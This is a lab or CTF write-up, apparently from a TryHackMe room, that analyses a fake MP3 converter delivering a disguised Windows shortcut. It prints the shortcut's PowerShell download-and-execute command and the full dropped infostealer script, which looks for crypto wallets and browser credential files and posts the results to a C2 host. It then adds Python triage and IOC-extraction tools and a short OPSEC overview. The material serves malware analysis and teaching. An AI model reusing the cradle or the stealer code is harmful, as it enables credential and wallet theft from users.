Investigating the Website

All I see is a YouTube MP4 to MP3 converter, so I try to download a video as an MP3 to see what's gonna happen. I got a zip file with two mp3 files (that's kinda SUS), so I decided to view the file type of both files.

┌──(neo㉿Neoxd)-[~/Downloads]
└─$ file song.mp3  
song.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo
┌──(neo㉿Neoxd)-[~/Downloads]
└─$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID win-base-2019, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat Sep 15 12:14:14 2018, atime=Sat Sep 15 12:14:14 2018, mtime=Sat Sep 15 12:14:14 2018, length=448000, window=normal, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

RIGHT, the second file is SUS. It's an MS Windows shortcut file, AKA a .lnk file.

Use the lnkinfo Tool

┌──(neo㉿Neoxd)-[~/Downloads]
└─$ lnkinfo somg.mp3
lnkinfo 20230716
 
Windows Shortcut information:
        Contains a link target identifier
        Contains a relative path string
        Contains a working directory string
        Contains a command line arguments string
        Number of data blocks           : 4
 
Link information:
        Creation time                   : Sep 15, 2018 07:14:14.454767300 UTC
        Modification time               : Sep 15, 2018 07:14:14.454767300 UTC
        Access time                     : Sep 15, 2018 07:14:14.454767300 UTC
        File size                       : 448000 bytes
        Icon index                      : 0
        Show Window value               : 0x00000001
        Hot Key value                   : 0
        File attribute flags            : 0x00000020
                Should be archived (FILE_ATTRIBUTE_ARCHIVE)
        Drive type                      : Fixed (3)
        Drive serial number             : 0xa8a4c362
        Volume label                    : 
        Local path                      : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
        Relative path                   : ..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
        Working directory               : C:\\Windows\\System32\\WindowsPowerShell\\v1.0
        Command line arguments          : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\\ProgramData\\s.ps1'); iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)"
 
Link target identifier:
        Shell item list
                Number of items         : 7
 
        Shell item: 1
                Item type               : Root folder
                Class type indicator    : 0x1f (Root folder)
                Shell folder identifier : 20d04fe0-3aea-1069-a2d8-08002b30309d
                Shell folder name       : My Computer
 
        Shell item: 2
                Item type               : Volume
                Class type indicator    : 0x2f (Volume)
                Volume name             : C:\
 
        Shell item: 3
                Item type               : File entry
                Class type indicator    : 0x31 (File entry: Directory)
                Name                    : Windows
                Modification time       : May 17, 2023 19:45:40
                File attribute flags    : 0x00000010
                        Is directory (FILE_ATTRIBUTE_DIRECTORY)
        Extension block: 1
                Signature               : 0xbeef0004 (File entry extension)
                Long name               : Windows
                Creation time           : Sep 15, 2018 06:09:28
                Access time             : May 17, 2023 19:45:40
                NTFS file reference     : MFT entry: 986, sequence: 1
 
        Shell item: 4
                Item type               : File entry
                Class type indicator    : 0x31 (File entry: Directory)
                Name                    : System32
                Modification time       : Oct 30, 2024 14:10:32
                File attribute flags    : 0x00000010
                        Is directory (FILE_ATTRIBUTE_DIRECTORY)
        Extension block: 1
                Signature               : 0xbeef0004 (File entry extension)
                Long name               : System32
                Creation time           : Sep 15, 2018 06:09:28
                Access time             : Oct 30, 2024 14:10:32
                NTFS file reference     : MFT entry: 30079, sequence: 1
 
        Shell item: 5
                Item type               : File entry
                Class type indicator    : 0x31 (File entry: Directory)
                Name                    : WindowsPowerShell
                Modification time       : Sep 15, 2018 07:19:02
                File attribute flags    : 0x00000010
                        Is directory (FILE_ATTRIBUTE_DIRECTORY)
        Extension block: 1
                Signature               : 0xbeef0004 (File entry extension)
                Long name               : WindowsPowerShell
                Creation time           : Sep 15, 2018 07:19:02
                Access time             : Sep 15, 2018 07:19:02
                NTFS file reference     : MFT entry: 31432, sequence: 1
 
        Shell item: 6
                Item type               : File entry
                Class type indicator    : 0x31 (File entry: Directory)
                Name                    : v1.0
                Modification time       : Sep 15, 2018 09:07:34
                File attribute flags    : 0x00000010
                        Is directory (FILE_ATTRIBUTE_DIRECTORY)
        Extension block: 1
                Signature               : 0xbeef0004 (File entry extension)
                Long name               : v1.0
                Creation time           : Sep 15, 2018 07:19:02
                Access time             : Sep 15, 2018 09:07:34
                NTFS file reference     : MFT entry: 31433, sequence: 1
 
        Shell item: 7
                Item type               : File entry
                Class type indicator    : 0x32 (File entry: File)
                Name                    : powershell.exe
                Modification time       : Sep 15, 2018 07:14:16
                File attribute flags    : 0x00000020
                        Should be archived (FILE_ATTRIBUTE_ARCHIVE)
        Extension block: 1
                Signature               : 0xbeef0004 (File entry extension)
                Long name               : powershell.exe
                Creation time           : Sep 15, 2018 07:14:16
                Access time             : Sep 15, 2018 07:14:16
                NTFS file reference     : MFT entry: 203979, sequence: 1
 
Data block: 1
        Signature                       : 0xa0000005 (Special folder location)
 
Data block: 2
        Signature                       : 0xa000000b (Known folder location)
 
Data block: 3
        Signature                       : 0xa0000003 (Distributed link tracker properties)
        Machine identifier              : win-base-2019
        Droid volume identifier         : f6953da0-d6bb-4c14-8dd4-1d39a7683054
        Droid file identifier           : 1be092cd-96c8-11ef-82da-02a0a1a4abe5
        Birth droid volume identifier   : f6953da0-d6bb-4c14-8dd4-1d39a7683054
        Birth droid file identifier     : 1be092cd-96c8-11ef-82da-02a0a1a4abe5
 
Data block: 4
        Signature                       : 0xa0000009 (Metadata property store)
        {dabd30ed-0043-4789-a7f8-d013a4736622}/100 (PKEY_ItemFolderPathDisplayNarrow)
                Value (0x001f)          : v1.0 (C:\Windows\System32\WindowsPowerShell)
 
        {46588ae2-4cbc-4338-bbfc-139326986dce}/4 (Unknown)
                Value (0x001f)          : S-1-5-21-1966530601-3185510712-10604624-500
 
        {b725f130-47ef-101a-a5f1-02608c9eebac}/10 (PKEY_ItemNameDisplay)
                Value (0x001f)          : powershell.exe
 
        {b725f130-47ef-101a-a5f1-02608c9eebac}/15 (PKEY_DateCreated)
                Value (0x0040)          : Sep 15, 2018 07:14:16.000000000 UTC
 
        {b725f130-47ef-101a-a5f1-02608c9eebac}/12 (Unknown)
                Value (0x0015)          : 448000
 
        {b725f130-47ef-101a-a5f1-02608c9eebac}/4 (PKEY_ItemTypeText)
                Value (0x001f)          : Application
 
        {b725f130-47ef-101a-a5f1-02608c9eebac}/14 (PKEY_DateModified)
                Value (0x0040)          : Sep 15, 2018 07:14:14.454767300 UTC
 
        {28636aa6-953d-11d2-b5d6-00c04fd918d0}/30 (PKEY_ParsingPath)
                Value (0x001f)          : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
 
        {446d16b1-8dad-4870-a748-402ea43d788c}/104 (System.VolumeId)
                Value (0x0048)          : 19127295-0000-0000-0000-100000000000
 

As the lnkinfo output shows, the .lnk file launches PowerShell with a malicious command line. Breakdown of the arguments:

  1. -ep Bypass:

    • Bypasses the PowerShell script execution policy so the script runs regardless of the system's restrictions.
  2. -nop:

    • No profile. Prevents PowerShell profiles from loading, which could otherwise detect or interfere with the script.
  3. -c:

    • Executes the provided command.
  4. (New-Object Net.WebClient).DownloadFile(…):

    • Downloads IS.ps1 from the raw.githubusercontent.com URL and saves it as C:\ProgramData\s.ps1.
  5. iex (Get-Content 'C:\ProgramData\s.ps1' -Raw):

    • Reads the downloaded script as a single string and executes it with iex (Invoke-Expression).
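To see where lnkinfo gets those fields from, here is a small Python parser added to this writeup (it is not part of the original post, of lnkinfo, or of the TryHackMe room). It reads the Shell Link header, skips the link target ID list, pulls LocalBasePath out of LinkInfo, decodes the StringData strings (relative path, working directory, command line arguments) and then applies a few triage rules: extension mismatch, interpreter as target, download cradle and in-memory execution in the arguments. The .lnk it analyses is constructed inside the script with a placeholder download URL (http://c2.example.invalid/s.ps1), not the real one from the sample; the function and constant names are my own.

```python
import re
import struct

# Shell Link header (MS-SHLLINK): size 0x4C, CLSID 00021401-0000-0000-C000-000000000046 (little-endian on disk)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# StringData entries appear in exactly this order, each only if its flag is set
STRING_DATA_ORDER = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the fields a triage needs: target path, working dir, arguments, window state."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags, attrs = struct.unpack_from("<II", data, 20)
    file_size, _icon_index, show_cmd = struct.unpack_from("<III", data, 52)
    pos = LNK_HEADER_SIZE

    # LinkTargetIDList: 2-byte IDListSize followed by the shell item list (not needed here)
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]

    # LinkInfo: LocalBasePath is present when LinkInfoFlags bit 0 (VolumeIDAndLocalBasePath) is set
    local_base_path = None
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:
            start = pos + base_off
            local_base_path = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += li_size

    # StringData: 2-byte character count, then UTF-16LE (IsUnicode) or ANSI characters
    strings = {}
    for bit, key in STRING_DATA_ORDER:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            strings[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
            pos += width * count

    return {"flags": flags, "file_attributes": attrs, "file_size": file_size,
            "show_command": show_cmd, "local_base_path": local_base_path, **strings}


INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe")
ARG_PATTERNS = {  # hypothetical triage rules for this example
    "execution policy bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "no profile": r"-nop\b",
    "download cradle": r"downloadfile|downloadstring|invoke-webrequest|\biwr\b",
    "in-memory execution": r"\biex\b|invoke-expression",
    "encoded command": r"-e(?:nc|ncodedcommand)\b",
}


def triage_lnk(filename: str, data: bytes) -> list:
    """Findings for one file; an empty list means it is not a .lnk or shows nothing suspicious."""
    try:
        info = parse_lnk(data)
    except ValueError:
        return []
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "lnk":
        findings.append(f"extension mismatch: .{ext} file is actually a Windows shortcut")
    target = (info["local_base_path"] or info.get("relative_path") or "").lower()
    if target.endswith(INTERPRETERS):
        findings.append(f"target is a script interpreter: {target}")
    for label, pattern in ARG_PATTERNS.items():
        if re.search(pattern, info.get("arguments", ""), re.IGNORECASE):
            findings.append(f"arguments: {label}")
    if info["show_command"] == 7:  # SW_SHOWMINNOACTIVE: console never shown to the user
        findings.append("window starts minimized")
    return findings


def build_sample_lnk(local_base_path, relative_path, working_dir, arguments, file_size=448000):
    """Constructed test fixture: minimal .lnk with a LinkInfo block and Unicode StringData."""
    flags = HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, file_size, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0xA8A4C362, 0x10) + b"\x00"  # fixed drive, empty label
    base = local_base_path.encode("cp1252") + b"\x00"
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return (header + link_info + string_data(relative_path) + string_data(working_dir)
            + string_data(arguments) + struct.pack("<I", 0))  # zero-size terminal extra-data block


# Constructed sample mirroring the layout seen in lnkinfo, with a placeholder URL
SAMPLE_ARGS = ("-ep Bypass -nop -c \"(New-Object Net.WebClient).DownloadFile("
               "'http://c2.example.invalid/s.ps1','C:\\ProgramData\\s.ps1'); "
               "iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\"")
SAMPLE_LNK = build_sample_lnk(
    local_base_path=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32\WindowsPowerShell\v1.0",
    arguments=SAMPLE_ARGS)

if __name__ == "__main__":
    for key, value in parse_lnk(SAMPLE_LNK).items():
        print(f"{key:16}: {value}")
    for finding in triage_lnk("somg.mp3", SAMPLE_LNK):
        print("[!]", finding)
```

Pointing parse_lnk at the bytes of a real shortcut (open(path, "rb").read()) gives the same fields lnkinfo printed above; the extension check is what catches the "mp3 that is really a .lnk" trick before anyone double-clicks it.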

Deep dive into the Malicious Script

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"
 
    Write-Host "         Created by the one and only M.M."
}
 
# Call the function to print the ASCII art
Print-AsciiArt
 
# Path for the info file
$infoFilePath = "stolen_info.txt"
 
# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}
 
# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
 
    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}
 
# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw
 
    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
 
# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

  1. ASCII Art Branding:

    • Prints a custom ASCII banner claiming it was created by "M.M."
  2. stolen_info.txt:

    • Creates a file (stolen_info.txt) to store the gathered data.
  3. Search for Sensitive Data:

    • Crypto Wallets:
      • Searches for wallet files in common directories for Bitcoin, Ethereum, Monero, and Dogecoin.
      • If found, records their paths in stolen_info.txt.
    • Browser Credentials:
      • Checks for Chrome's Login Data (an SQLite database).
      • Looks for Firefox's logins.json (contains saved credentials).
      • Records their paths if found.
  4. Exfiltration to Command and Control (C2) Server:

    • Reads stolen_info.txt and sends its contents in an HTTP POST to http://papash3ll.thm/data using Invoke-WebRequest.
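The breakdown above was done by reading the script by hand. As an added example (mine, not from the original post or the TryHackMe room), here is a Python extractor that produces the same kind of report automatically from a dropped .ps1: the C2 URL, the staging file, the artifact paths it hunts for grouped by category, and the cmdlets used to send the data out. The script it runs on is a constructed, cut-down stand-in with a placeholder C2 URL (http://c2.example.invalid/data); the regexes and category names are my own choices.

```python
import re

# Constructed fixture: a shortened stand-in for the dropped script, with a placeholder C2 URL
SAMPLE_SCRIPT = r'''
$infoFilePath = "stolen_info.txt"
function Search-ForWallets {
    $walletPaths = @("$env:USERPROFILE\.bitcoin\wallet.dat", "$env:USERPROFILE\.ethereum\keystore\*")
    foreach ($path in $walletPaths) { if (Test-Path $path) { Add-Content -Path $infoFilePath -Value "Found wallet: $path" } }
}
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
    if (Test-Path $chromePath) { Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath" }
}
function Send-InfoToC2Server {
    $c2Url = "http://c2.example.invalid/data"
    $data = Get-Content -Path $infoFilePath -Raw
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
Search-ForWallets; Search-ForBrowserCredentials; Send-InfoToC2Server
'''

URL_RE = re.compile(r"""https?://[^\s'"`)\];]+""", re.I)           # literal http(s) URLs
ENV_PATH_RE = re.compile(r'"(\$env:[A-Za-z_]+\\[^"]*)"')           # "$env:VAR\..." path strings
OUTPUT_FILE_RE = re.compile(r'\$\w+\s*=\s*"([^"]+\.(?:txt|log|dat))"', re.I)  # local staging files
NETWORK_CMDLETS = ("invoke-webrequest", "invoke-restmethod", "net.webclient",
                   "downloadstring", "downloadfile", "start-bitstransfer")
ARTIFACT_CLASSES = (  # hypothetical categories for this example
    ("crypto wallet", re.compile(r"wallet|keystore", re.I)),
    ("browser credentials", re.compile(r"login data|logins\.json|web data|cookies", re.I)),
)


def extract_iocs(script: str) -> dict:
    """Static triage of a PowerShell stealer: what it collects, where it stages, where it sends."""
    lower = script.lower()
    targets = {}
    for path in sorted(set(ENV_PATH_RE.findall(script))):
        for label, rx in ARTIFACT_CLASSES:
            if rx.search(path):
                targets.setdefault(label, []).append(path)
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "staging_files": sorted(set(OUTPUT_FILE_RE.findall(script))),
        "targets": targets,
        "network_cmdlets": [c for c in NETWORK_CMDLETS if c in lower],
        "http_post": bool(re.search(r"-method\s+post", lower)),
    }


def classify(iocs: dict) -> str:
    """One-line verdict: collection plus an outbound channel is the infostealer pattern."""
    collects = bool(iocs["targets"])
    exfils = bool(iocs["urls"]) and bool(iocs["network_cmdlets"])
    if collects and exfils:
        return "infostealer: collects " + ", ".join(sorted(iocs["targets"])) + " and exfiltrates over HTTP"
    if exfils:
        return "downloader/exfiltration only"
    if collects:
        return "local collection only"
    return "no stealer indicators"


if __name__ == "__main__":
    report = extract_iocs(SAMPLE_SCRIPT)
    for key, value in report.items():
        print(f"{key:16}: {value}")
    print("verdict         :", classify(report))
```

The URLs and staging file names it returns are the pieces you would block or hunt for next (proxy logs for the POST, endpoints for C:\ProgramData\*.ps1 and stolen_info.txt), which is the hand-off from this analysis to the "Searching the Source" step.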

Searching the Source

“There are many paths we could take to continue our investigation. We could investigate the website further, analyse its source code, or search for open directories that might reveal more information about the malicious actor’s setup. We can search for the hash or signature on public malware databases like VirusTotal or Any.Run. Each of these methods could yield useful clues.”


Introduction to OPSEC

Operational Security (OPSEC) is crucial for protecting sensitive information and operations from adversaries. Failure to practice good OPSEC, even by malicious actors, often leads to their exposure.

In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

  • Account Reuse: Reusing usernames, emails, or handles across platforms links online personas.
  • Metadata Leaks: Leaving identifying metadata (device names, GPS data, timestamps) in code, documents, or images.
  • Publicly Identifiable Information: Posting details linking online activity to real-world identity, location, or habits on public forums or platforms like GitHub.
  • Lack of Network Anonymity: Failing to use VPNs or proxies to mask IP addresses.

Real-world examples of OPSEC failures

  • AlphaBay Admin (Alexandre Cazes): Used a revealing email address (“pimp_alex_91@hotmail.com”), reused the username “Alpha02” across platforms, and linked his Bitcoin account to his real name.

  • Chinese Military Hacking Group (APT1): A member signed malware with the nickname “Ugly Gorilla,” linked to his real name on programming forums. The group used predictable naming conventions and operated consistently during Beijing business hours.

These examples demonstrate that even sophisticated actors make human errors that compromise their anonymity and lead to identification by law enforcement and security researchers. The core principle of OPSEC is proactive identification and mitigation of vulnerabilities before they can be exploited by adversaries.